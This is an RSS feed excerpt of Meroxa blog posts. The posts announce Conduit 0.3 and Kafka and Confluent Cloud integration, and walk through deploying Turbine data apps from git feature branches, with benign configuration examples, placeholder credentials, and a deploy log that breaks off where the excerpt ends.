&lt;p&gt;With the introduction of connector middleware, we intend to make the connector developer experience even simpler. Connector developers can use middleware provided by the SDK to enrich the functionality of their connectors without reinventing the wheel. Conduit users benefit from middleware as well, since the functionality a middleware provides works the same way across all connectors.&lt;/p&gt;
&lt;p&gt;If this got you interested in &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; don’t hesitate to join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; and say hello! We invite you to give &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; a try and let us know what you like and don’t like. Our mission is to make Conduit the go-to tool for data integration and your feedback can help us reach that goal!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Announcing Conduit 0.3]]></title><description><![CDATA[Conduit is a tool that helps developers move data within their infrastructure to the places they’re needed. ]]></description><link>https://meroxa.com/blog/announcing-conduit-0.3</link><guid isPermaLink="false">https://meroxa.com/blog/announcing-conduit-0.3</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 27 Sep 2022 14:53:25 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.3 is here! Conduit is a tool that helps developers move data within their infrastructure to the places they’re needed.&lt;/p&gt;
&lt;p&gt;Getting started is as easy as downloading Conduit from the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.3.0&quot;&gt;Releases page&lt;/a&gt; on GitHub and running:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;./conduit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;What’s New&lt;/h2&gt;
&lt;h3&gt;OpenCDC - Consistency in Payloads&lt;/h3&gt;
&lt;p&gt;One of the biggest pieces of work in this release is Conduit’s support for &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-protocol/blob/main/proto/opencdc/v1/opencdc.proto&quot;&gt;OpenCDC&lt;/a&gt;. A gripe that we hear about production data integration tools is that the formats for Change Data Capture (CDC) can be all over the place even between connectors within the same tool! The downstream impact is that developers then need to code toward specific connectors. OpenCDC provides high-level guarantees on the format that you can expect from any connector that has CDC support in Conduit.&lt;img src=&quot;https://lh6.googleusercontent.com/MAjJjDjIr357veO0ZfMuY4dq3kXC1MRotw4JXoiXOndved2d9DRnpxUkzFWzE3v1ihM7j6mC8e6J5jTNjKTh_EV8H7Ds4mVv5st5iQzrT8IRrWJRn9dbGAqcR7TYnkPXubtskN7gsyMov5GDfDpOszO0BrtMw2zdIRVbTu99mEsbOLBoo3z5VYefGw&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;OpenCDC represents a breaking change in Conduit’s Connector SDK. This means that any connector that hasn’t been updated to work with 0.3 will only work with 0.2. We’ve updated the &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/connectors.md&quot;&gt;connector list&lt;/a&gt; in the Conduit repo to reflect which connectors are ready for OpenCDC. You can check out this &lt;a href=&quot;https://meroxa.com/blog/a-proposal-for-better-interoperability-with-change-data-capture&quot;&gt;blog post&lt;/a&gt; to learn more about OpenCDC.&lt;/p&gt;
&lt;h3&gt;Create Pipelines with a Pipeline Config File&lt;/h3&gt;
&lt;p&gt;In some production situations, you might not want to orchestrate pipelines via an API or a UI. If your data stores don’t change all that much, a &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/pipeline_configuration_files.md&quot;&gt;static file&lt;/a&gt; might be the best way to configure a pipeline. With the release of the Pipeline Config File feature, you can use &lt;code class=&quot;language-text&quot;&gt;yaml&lt;/code&gt; to configure pipelines. The added benefit of this feature is that you can put the file in source control and make more measured changes to any of your pipelines.&lt;img src=&quot;https://lh6.googleusercontent.com/uKSmOS9d7Dx0QHKT6J7BJrRsTE1cwMYA0zQ2wOcmf0hnP1xt8mV3Q9t26dJ7y_54urPyRZk-Y8pTMW2HuyBtIPVblDtcwmzCARFqLyhvOytGvjeuCnKE439hVD1xyhfiij-TzzY07IU01JuDjzGwDRo6Na7UiYsUUClKfBIo1we90hLj8v3GVdnSlw&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;h3&gt;JavaScript Processors&lt;/h3&gt;
&lt;p&gt;Imagine a scenario where you need to drop personally identifiable information before any data reaches less sensitive downstream systems. The best way to do this is to attach some code to the pipeline. In Conduit 0.3, it’s now possible to use JavaScript to transform data. JavaScript is the first language we support, but we plan to add support for more languages over time. Don’t worry, Conduit does not have an external dependency on Node.js; it uses &lt;a href=&quot;https://github.com/dop251/goja&quot;&gt;goja&lt;/a&gt;, a JavaScript engine written in Go, to make this possible.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/processors.md&quot;&gt;Processors&lt;/a&gt; can be injected after data comes from a source connector, during the pipeline itself, or before the data goes to a destination connector. The best way to build processors is to include them as part of your pipeline configuration file like so:&lt;img src=&quot;https://lh6.googleusercontent.com/xFmkpl-7bwE8CCsLrTMPBLpBQ1ffrlSSgFQLDSoHSKHMli6ZP65PcayNktWawtrfmEMueQSaYj9o7ysydagZDtnITy8b9-d3fn4MAy8YOsSOLAE2TYQq1sOk90Fp_Plf3F1dqDpX1e1NtZnfNSxm1QqDr3xlG8wU8bD9mHqJeFcNC_3c2lE_xqvHBA&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
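&lt;p&gt;In case the image above does not render in your reader, here is a rough sketch of what such a configuration could look like. The field names and the script are illustrative assumptions; refer to the processors documentation linked above for the exact schema:&lt;/p&gt;

```yaml
version: 1.0
pipelines:
  example-pipeline:
    status: running
    connectors:
      source-1:
        type: source
        plugin: builtin:file
        settings:
          path: ./input.txt
        # A processor attached to the source connector; the JavaScript
        # function below runs for every record this source produces.
        processors:
          drop-pii:
            type: js
            settings:
              script: |
                function process(record) {
                  // drop a sensitive field before it travels downstream
                  delete record.Payload.ssn;
                  return record;
                }
```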
&lt;p&gt;Processors can also be created as part of an API call to Conduit. This is great in cases where you’re building pipelines programmatically as part of your internal processes or even your own product!&lt;/p&gt;
&lt;h3&gt;And So Much More&lt;/h3&gt;
&lt;p&gt;If you want to see the full list of what was included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.3.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. This blog post only covers a fraction of what was included. In the coming weeks, we’ll be releasing more blog posts on topics like the performance benchmarks of Conduit 0.3 and connector middleware.&lt;/p&gt;
&lt;p&gt;The Conduit team would love to hear about how you’re using Conduit in your setup. Please hit us up on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;, &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;, or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Bringing Continuous Delivery to Kafka & Streaming Data Apps]]></title><description><![CDATA[Bringing continuous delivery to Kafka and streaming data apps with Apache Kafka Connector and Feature Branch Deploys.]]></description><link>https://meroxa.com/blog/bringing-continuous-delivery-to-kafka-streaming-data-apps</link><guid isPermaLink="false">https://meroxa.com/blog/bringing-continuous-delivery-to-kafka-streaming-data-apps</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Wed, 14 Sep 2022 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Writing applications against streaming or event-driven data is an incredible challenge. Developers are beholden to upstream schemas or have to write a considerable amount of plumbing with streaming systems before getting to the value-add work of their applications. In web development, developers are in control of their schemas. Any time a new feature is built that needs to persist some data, the developer writes a change to the schema and deploys it when they choose to. For streaming applications, the developers aren’t in control. They’re at the mercy of whatever upstream system or process generates the data.&lt;/p&gt;
&lt;p&gt;Today we’re happy to announce two new features on the Meroxa platform that aim to make developing against streaming data easier. The first is the Apache Kafka Connector. The concepts and paradigms for streaming data started with Apache Kafka. The second is Feature Branch Deploys for streaming data applications. The ability to test a streaming application against staging and a copy of production data is critical. It gives developers confidence that their changes, once merged to the &lt;code class=&quot;language-text&quot;&gt;main&lt;/code&gt; branch and deployed to production, will work as expected.&lt;/p&gt;
&lt;h3&gt;Apache Kafka Connector&lt;/h3&gt;
&lt;p&gt;Many streaming applications start with the core infrastructure of Apache Kafka. Its ability to let developers produce data to and consume data from any number of systems or streaming applications is what’s made it successful. Part of the challenge for any developer learning to build apps on Apache Kafka is all the new streaming paradigms, such as delivery semantics and partitions, to name just a few. With support for Apache Kafka on Meroxa, as both a source and a destination, it’s never been easier to focus on business logic instead of plumbing. Check out the feature launch &lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;blog post&lt;/a&gt; for more details. Support for producing to and consuming from Apache Kafka is just the beginning as we work toward enabling developers to focus on value-add development instead of plumbing.&lt;/p&gt;
&lt;h3&gt;Feature Branch Deploys&lt;/h3&gt;
&lt;p&gt;Feature Branch Deploys is the first step on a path to enabling modern continuous delivery practices for streaming data applications. Writing unit and integration tests is important when building any application, whether it’s a web app or a streaming data app. They let you know whether what you’ve built meets your requirements and expectations. That level of testing is already possible when building Turbine streaming data apps. Still, nothing compares to taking what you’ve built and testing it against staging or production data. After all, data is what drives streaming applications.&lt;/p&gt;
&lt;p&gt;Any time you have a branch in your Turbine application, you’ll be able to deploy that branch directly to Meroxa. Meroxa will do the work of sending your application the data you want it to consume, while making sure it doesn’t impact the production version of the application. Check out our &lt;a href=&quot;https://meroxa.com/blog/turbine-feature-branch-deploys&quot;&gt;write-up on Feature Branch Deploys&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Get Started with Meroxa&lt;/h3&gt;
&lt;p&gt;Both features are available today on the Meroxa platform. Get started by creating your own Turbine streaming data application and let us know what you’re building! We’d love to hear about it, so don&apos;t forget to share with us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt; or in our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord community&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[New Integration Resources: Apache Kafka and Confluent Cloud]]></title><description><![CDATA[We are taking an important step towards helping customers build data applications with support for Apache Kafka as a resource on Meroxa. ]]></description><link>https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud</link><guid isPermaLink="false">https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Wed, 14 Sep 2022 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Behind every streaming application exists a combination of data and events. With the rising popularity and complexity of event-driven and streaming architectures,&lt;a href=&quot;https://meroxa.com/blog/a-tale-of-two-apps-web-apps-and-data-apps&quot;&gt;data applications&lt;/a&gt; offer developers a powerful solution. Data applications are centered around real-time or near real-time events which is key for a lot of modern data processing applications. Today, we are taking an important step towards helping customers build data applications with support for Apache Kafka as a resource on Meroxa.&lt;/p&gt;
&lt;p&gt;Apache Kafka is an open-source streaming platform maintained by the Apache Software Foundation. Since its creation in 2011, Kafka has evolved from a messaging queue into a robust event streaming platform. Confluent Cloud is a fully managed, cloud-native Kafka service for connecting and processing all of your data, everywhere it’s needed, built by Confluent, the company founded by the original Kafka developers who ran the service at massive scale at LinkedIn. Apache Kafka and Confluent Cloud can now be added as resources on the Meroxa Platform with just a few steps. Adding support for producing to and consuming from Apache Kafka topics and streams is only the beginning as we continue to make data apps easier for developers to build.&lt;/p&gt;
&lt;h2&gt;Getting Started&lt;/h2&gt;
&lt;p&gt;Kafka is a distributed system consisting of servers and clients that communicate via a high-performance TCP network protocol. In Kafka, a &lt;strong&gt;Topic&lt;/strong&gt; is a category/name used to store and publish records, similar to a table in a database. The server that hosts the topics is called a &lt;strong&gt;Broker&lt;/strong&gt;, and a &lt;strong&gt;Cluster&lt;/strong&gt; typically consists of multiple brokers working together to provide scale and reliability. &lt;strong&gt;Bootstrap servers&lt;/strong&gt; are the host and port pairs that represent the addresses of the brokers.&lt;/p&gt;
&lt;p&gt;In the following examples, we will walk you through the steps necessary to add Apache Kafka as a resource on the Meroxa Platform.&lt;/p&gt;
&lt;h2&gt;Apache Kafka&lt;/h2&gt;
&lt;p&gt;To connect to Apache Kafka, you need an Apache Kafka server. Refer to the &lt;a href=&quot;https://kafka.apache.org/quickstart&quot;&gt;Apache Kafka quickstart&lt;/a&gt; to create one.&lt;/p&gt;
&lt;h3&gt;Prerequisites&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Bootstrap server information available in the &lt;code class=&quot;language-text&quot;&gt;server.properties&lt;/code&gt; file&lt;/li&gt;
&lt;li&gt;Username and Password available in the &lt;code class=&quot;language-text&quot;&gt;KafkaServer&lt;/code&gt; section in the JAAS file&lt;/li&gt;
&lt;li&gt;The Certificate Authority (CA) file, the client certificate, and the client key, if Secure Sockets Layer (SSL) encryption is used&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the information above, you can add Apache Kafka as a resource through the CLI or Dashboard.&lt;/p&gt;
&lt;h3&gt;Meroxa CLI&lt;/h3&gt;
&lt;p&gt;In the CLI, use the &lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt; command to configure your Apache Kafka resource.&lt;/p&gt;
&lt;p&gt;The following example shows how this command is used to create an Apache Kafka resource named &lt;code class=&quot;language-text&quot;&gt;apachekafka&lt;/code&gt; with the minimum configuration required.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create apachekafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; kafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;kafka+sasl+ssl://&amp;lt;USERNAME&gt;:&amp;lt;PASSWORD&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&quot;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token output&quot;&gt;\&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the example above, replace the following variables with valid credentials from your Apache Kafka environment:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;$USERNAME - Apache Kafka Username
$PASSWORD - Apache Kafka Password
$BOOTSTRAP_SERVER -  Host and Port of the Kafka broker&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For additional configuration and information on how to add Apache Kafka Resource, check out the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/apachekafka&quot;&gt;Apache Kafka Resource documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Meroxa Dashboard&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/apache%20kafka.jpg&quot; alt=&quot;apache kafka&quot;&gt;&lt;/p&gt;
&lt;p&gt;Combine the username, password, and bootstrap server information to construct a Connection URL in the following format:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;kafka+sasl+ssl://&amp;lt;USERNAME&gt;:&amp;lt;PASSWORD&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
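&lt;p&gt;If your username or password contains URL-reserved characters such as @ or :, percent-encode them before embedding them in the Connection URL, or the URL may not parse correctly. A minimal sketch (the credential values below are placeholders, not real credentials):&lt;/p&gt;

```javascript
// Build a Kafka connection URL from its parts, percent-encoding the
// credentials so characters like '@' or ':' don't break URL parsing.
// The values below are placeholders, not real credentials.
const username = "my-user";
const password = "p@ss:word"; // contains URL-reserved characters
const bootstrapServer = "broker.example.com:9092";

const url =
  "kafka+sasl+ssl://" +
  encodeURIComponent(username) + ":" +
  encodeURIComponent(password) + "@" +
  bootstrapServer + "?sasl_mechanism=plain";

console.log(url);
// kafka+sasl+ssl://my-user:p%40ss%3Aword@broker.example.com:9092?sasl_mechanism=plain
```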
&lt;p&gt;If you’re using Secure Sockets Layer (SSL) encryption, you can toggle Establish a trusted connection and input the Certificate Authority (CA) file, the client certificate, and the client key.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Confluent Cloud&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To connect to Confluent Cloud Apache Kafka, you need to have a Kafka cluster. Refer to Confluent’s &lt;a href=&quot;https://developer.confluent.io/quickstart/kafka-on-confluent-cloud/&quot;&gt;quickstart guide&lt;/a&gt; to create one.&lt;/p&gt;
&lt;h3&gt;Prerequisites&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;API key (follow this &lt;a href=&quot;https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#create-keys-for-a-cluster&quot;&gt;guide&lt;/a&gt; to set up your API keys)&lt;/li&gt;
&lt;li&gt;API secret (available alongside the API key)&lt;/li&gt;
&lt;li&gt;Bootstrap server (refer to your &lt;a href=&quot;https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#view-cluster-details&quot;&gt;cluster settings&lt;/a&gt; to retrieve the Bootstrap Server)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the information above, you can add Apache Kafka as a resource through the CLI or Dashboard.&lt;/p&gt;
&lt;h3&gt;CLI&lt;/h3&gt;
&lt;p&gt;Use the &lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt; command to configure your Confluent Cloud resource.&lt;/p&gt;
&lt;p&gt;The following example depicts how this command is used to create a Confluent Cloud resource named &lt;code class=&quot;language-text&quot;&gt;confluentcloud&lt;/code&gt; with the minimum configuration required.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create confluentcloud &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; confluentcloud &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;kafka+sasl+ssl://&amp;lt;API_KEY&gt;:&amp;lt;API_SECRET&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&quot;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token output&quot;&gt;\&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the example above, replace the following variables with valid credentials from your Confluent Cloud Console:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;$API_KEY - Cluster API Key
$API_SECRET - Cluster API Secret
$BOOTSTRAP_SERVER -  Host and Port of the Cluster&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For additional information on how to add Confluent Cloud Resource, check out the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/confluentcloud&quot;&gt;Confluent Cloud Resource documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Dashboard&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/confluentcloud.jpg&quot; alt=&quot;confluentcloud&quot;&gt;&lt;/p&gt;
&lt;p&gt;Input the API Key, API Secret, and Bootstrap Server information into the corresponding fields to add a Confluent Cloud Kafka resource.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Things to know&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;With Kafka, you can pick a data format of your choice. Be consistent with that format when streaming from Kafka upstream to any downstream resources. Currently, Meroxa only supports JSON.&lt;/li&gt;
&lt;li&gt;Meroxa uses SASL/PLAIN configuration to authenticate with Kafka. SASL/PLAIN is a simple username/password authentication mechanism that is typically combined with TLS encryption to implement secure authentication.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We can’t wait to see what you build! 🚀&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Turbine Feature Branch Deploys]]></title><description><![CDATA[Data apps may undergo several code changes during the development lifecycle. Feature branches allow developers to branch off the main or production instance of the data app code without impacting production code.]]></description><link>https://meroxa.com/blog/turbine-feature-branch-deploys</link><guid isPermaLink="false">https://meroxa.com/blog/turbine-feature-branch-deploys</guid><dc:creator><![CDATA[Sara Menefee]]></dc:creator><pubDate>Wed, 14 Sep 2022 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;At Meroxa we have committed to delivering exceptional developer experiences. Today, we are excited to introduce feature branch deploys—a first step toward enabling continuous delivery for Turbine data applications on the Meroxa Platform.&lt;/p&gt;
&lt;p&gt;Data applications may undergo several code changes by one or many developers throughout the development lifecycle. Using feature branches, contributing developers can effectively branch off the &lt;code class=&quot;language-text&quot;&gt;main&lt;/code&gt; or production instance of their data application code. This allows them to further develop and test changes without impacting production code.&lt;/p&gt;
&lt;p&gt;Deploying from feature branches enables developers to test the outcomes of their code directly against production data—a crucial step before merging and deploying their code to the production instance of their data application.&lt;/p&gt;
&lt;h2&gt;Deploying from a feature branch&lt;/h2&gt;
&lt;p&gt;In the following examples, we will walk you through the steps necessary to deploy a Turbine data application from a feature branch.&lt;/p&gt;
&lt;h3&gt;Create a feature branch&lt;/h3&gt;
&lt;p&gt;First, create a feature branch and give it a descriptive name. The name you choose for your feature branch is automatically appended to the end of your application name when deployed to Meroxa. This helps distinguish test instances from production instances of your Turbine data applications.&lt;/p&gt;
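&lt;p&gt;The resulting naming scheme can be sketched as follows (an illustrative reconstruction, not Meroxa’s actual implementation):&lt;/p&gt;

```javascript
// Feature-branch deploys derive the deployed app name from the base app
// name plus the branch name. This is an illustrative reconstruction of
// the naming scheme, not Meroxa's actual code.
function deployedAppName(appName, branch) {
  return branch === "main" ? appName : `${appName}-${branch}`;
}

console.log(deployedAppName("users", "transform")); // users-transform
```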
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; checkout &lt;span class=&quot;token parameter variable&quot;&gt;-b&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;transform&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;Switched to a new branch &apos;transform&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once the feature branch is checked out, you are ready to launch your code editor and begin making changes. When using feature branch deploys to test, carefully review your Turbine code to ensure the appropriate data resources are used for testing, and swap out any downstream production data resources with test resources. This helps prevent unintended updates to production data.&lt;/p&gt;
&lt;p&gt;🎈 &lt;strong&gt;Note:&lt;/strong&gt; Testing resources must be created and configured on Meroxa to be accessible to your Turbine data app test instances.&lt;/p&gt;
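&lt;p&gt;One way to keep production destinations out of feature-branch deploys is to select the destination resource name based on the branch being deployed. This is only a sketch: the resource names and the &lt;code class=&quot;language-text&quot;&gt;BRANCH&lt;/code&gt; environment variable are assumptions, and the helper function is not part of the Turbine API.&lt;/p&gt;

```javascript
// Pick the destination resource based on the branch being deployed, so a
// feature-branch deploy writes to a test resource instead of production.
// "pg_prod", "pg_test", and the BRANCH environment variable are
// illustrative names, not part of the Turbine API.
function destinationFor(branch) {
  return branch === "main" ? "pg_prod" : "pg_test";
}

// In a Turbine app this class would be assigned to exports.App:
class App {
  async run(turbine) {
    let source = await turbine.resources("pg_users");
    let records = await source.records("users");
    let destination = await turbine.resources(
      destinationFor(process.env.BRANCH || "main")
    );
    await destination.write(records, "users_copy");
  }
}
```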
&lt;h3&gt;Commit your changes&lt;/h3&gt;
&lt;p&gt;Next, commit your code to prepare for deployment. Be sure to look over your Turbine code before committing your changes. It is also good to ensure you’re on the correct branch, which you can check by running the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; branch&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  main
* transform&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once you’ve confirmed you’re on the correct branch, commit your code with the following commands:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Anonymize PII field&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;[transform 1a1234b] Anonymize PII field
1 file changed, 1 insertion(+), 1 deletion(-)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Deploy&lt;/h3&gt;
&lt;p&gt;Once the code is committed, you’re ready to deploy. Simply run the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;Checking for uncommitted changes...
  ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
Preparing application &quot;users-transform&quot; (golang) for deployment...
  ✔ Application built!
✔ Can access your Turbine resources
  ✔ Application processes found. Creating application image...
  ✔ Platform source fetched
✔ Dockerfile created
  ⠋ Creating &quot;/Users/local/path/users&quot; in &quot;turbine-users-transform.tar.gz&quot;
  ✔ &quot;turbine-users-transform.tar.gz&quot; successfully created in &quot;/Users/local/path/users&quot;
  ✔ Source uploaded
  ✔ Removed &quot;turbine-users-transform.tar.gz&quot;
  ⠋Removing Dockerfile created for your application in /Users/local/path/users
  ✔ Dockerfile removed
  ✔ Successfully built Process image! (&quot;UUID&quot;)
  ✔ Deploy complete!
  ✔ Application &quot;users-transform&quot; successfully created!
  
